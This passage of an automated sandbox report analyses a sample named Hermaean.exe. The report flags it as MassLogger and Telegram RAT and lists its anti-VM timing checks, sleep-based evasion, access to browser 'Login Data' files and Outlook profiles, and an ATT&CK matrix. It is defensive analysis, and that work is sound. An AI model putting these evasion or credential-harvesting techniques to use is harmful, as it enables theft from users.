            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\Hermaean.exeAPI/Special instruction interceptor: Address: 5B7892F
            Source: C:\Users\user\Desktop\Hermaean.exeAPI/Special instruction interceptor: Address: 1FF892F
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\Desktop\Hermaean.exeRDTSC instruction interceptor: First address: 5B18F15 second address: 5B18F15 instructions: 0x00000000 rdtsc 0x00000002 test dh, dh 0x00000004 test eax, ebx 0x00000006 cmp ebx, ecx 0x00000008 jc 00007F7FB8B3C032h 0x0000000a test cl, dl 0x0000000c inc ebp 0x0000000d inc ebx 0x0000000e cmp eax, ecx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\Hermaean.exeRDTSC instruction interceptor: First address: 1F98F15 second address: 1F98F15 instructions: 0x00000000 rdtsc 0x00000002 test dh, dh 0x00000004 test eax, ebx 0x00000006 cmp ebx, ecx 0x00000008 jc 00007F7FB85004E2h 0x0000000a test cl, dl 0x0000000c inc ebp 0x0000000d inc ebx 0x0000000e cmp eax, ecx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\Hermaean.exeMemory allocated: 4990000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeMemory allocated: 35320000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeMemory allocated: 35150000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 599844Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 599641Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 599532Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 599407Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 599282Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 599157Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 599032Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 598922Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 598813Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 598688Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 598563Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 598438Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 598313Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 598204Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 598079Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 597954Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 597829Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 597704Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 597579Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 597454Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 597311Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 596954Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 596735Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 596625Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 596516Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 596391Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 596282Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 596157Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 596032Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 595922Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 595813Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 595688Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 595563Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 595438Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 595313Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 595203Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 595094Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 594969Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 594860Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 594735Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 594610Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 594485Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 594360Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 594235Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 594110Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 593985Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 593860Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 593735Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 593610Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 593485Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 593360Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeWindow / User API: threadDelayed 851Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeWindow / User API: threadDelayed 8955Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsxC682.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Hermaean.exeAPI coverage: 3.1 %
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep time: -26747778906878833s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 3160Thread sleep count: 851 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep time: -599844s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep time: -599641s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 3160Thread sleep count: 8955 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep time: -599532s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep count: 34 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep time: -599407s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep time: -599282s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep time: -599157s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep time: -599032s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep time: -598922s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep time: -598813s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep time: -598688s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep time: -598563s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep time: -598438s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep time: -598313s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep time: -598204s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep time: -598079s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep time: -597954s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep time: -597829s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep time: -597704s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep time: -597579s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep time: -597454s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep time: -597311s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep time: -596954s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep time: -596735s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep time: -596625s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep time: -596516s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep time: -596391s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep time: -596282s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep time: -596157s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep time: -596032s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep time: -595922s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep time: -595813s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep time: -595688s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep time: -595563s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep time: -595438s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep time: -595313s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep time: -595203s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep time: -595094s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep time: -594969s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep time: -594860s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep time: -594735s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep time: -594610s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep time: -594485s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep time: -594360s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep time: -594235s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep time: -594110s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep time: -593985s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep time: -593860s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep time: -593735s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep time: -593610s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep time: -593485s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exe TID: 5460Thread sleep time: -593360s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 1_2_0040276E FindFirstFileW,1_2_0040276E
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 1_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,1_2_00405770
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 1_2_0040622B FindFirstFileW,FindClose,1_2_0040622B
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_0040276E FindFirstFileW,6_2_0040276E
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,6_2_00405770
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_0040622B FindFirstFileW,FindClose,6_2_0040622B
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 599844Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 599641Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 599532Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 599407Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 599282Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 599157Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 599032Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 598922Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 598813Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 598688Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 598563Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 598438Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 598313Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 598204Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 598079Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 597954Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 597829Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 597704Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 597579Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 597454Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 597311Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 596954Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 596735Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 596625Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 596516Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 596391Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 596282Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 596157Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 596032Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 595922Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 595813Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 595688Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 595563Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 595438Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 595313Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 595203Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 595094Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 594969Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 594860Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 594735Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 594610Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 594485Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 594360Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 594235Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 594110Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 593985Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 593860Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 593735Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 593610Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 593485Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeThread delayed: delay time: 593360Jump to behavior
            Source: Hermaean.exe, 00000006.00000002.2992279228.0000000004C4B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWV
            Source: Hermaean.exe, 00000006.00000002.2992279228.0000000004BE8000.00000004.00000020.00020000.00000000.sdmp, Hermaean.exe, 00000006.00000002.2992279228.0000000004C4B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\Hermaean.exeAPI call chain: ExitProcess graph end nodegraph_1-4490
            Source: C:\Users\user\Desktop\Hermaean.exeAPI call chain: ExitProcess graph end nodegraph_1-4494
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 1_2_00401752 lstrcatW,CompareFileTime,LdrInitializeThunk,SetFileTime,CloseHandle,lstrcatW,1_2_00401752
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 1_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress,1_2_00406252
            Source: C:\Users\user\Desktop\Hermaean.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeProcess created: C:\Users\user\Desktop\Hermaean.exe "C:\Users\user\Desktop\Hermaean.exe"Jump to behavior
            Source: Hermaean.exe, 00000006.00000002.3012907907.0000000035538000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR
            Source: Hermaean.exe, 00000006.00000002.3012907907.0000000035538000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: C:\Users\user\Desktop\Hermaean.exeQueries volume information: C:\Users\user\Desktop\Hermaean.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 1_2_00405F0A GetVersion,LdrInitializeThunk,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,1_2_00405F0A
            Source: C:\Users\user\Desktop\Hermaean.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected MassLogger RAT
            Source: Yara matchFile source: 00000006.00000002.3012907907.0000000035475000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Hermaean.exe PID: 2920, type: MEMORYSTR
            Yara detected Telegram RAT
            Source: Yara matchFile source: 00000006.00000002.3012907907.0000000035475000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Hermaean.exe PID: 2920, type: MEMORYSTR
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\Hermaean.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Users\user\Desktop\Hermaean.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 00000006.00000002.3012907907.0000000035475000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Hermaean.exe PID: 2920, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected MassLogger RAT
            Source: Yara matchFile source: 00000006.00000002.3012907907.0000000035475000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Hermaean.exe PID: 2920, type: MEMORYSTR
            Yara detected Telegram RAT
            Source: Yara matchFile source: 00000006.00000002.3012907907.0000000035475000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Hermaean.exe PID: 2920, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		3
            File and Directory Discovery            		Remote Services1
            Archive Collected Data            		1
            Web Service            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            Registry Run Keys / Startup Folder            		12
            Process Injection            		1
            Deobfuscate/Decode Files or Information            		LSASS Memory215
            System Information Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            Registry Run Keys / Startup Folder            		3
            Obfuscated Files or Information            		Security Account Manager21
            Security Software Discovery            		SMB/Windows Admin Shares1
            Email Collection            		21
            Encrypted Channel            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            DLL Side-Loading            		NTDS1
            Process Discovery            		Distributed Component Object Model2
            Clipboard Data            		3
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Masquerading            		LSA Secrets31
            Virtualization/Sandbox Evasion            		SSHKeylogging14
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
            Virtualization/Sandbox Evasion            		Cached Domain Credentials1
            Application Window Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
            Process Injection            		DCSync1
            System Network Configuration Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.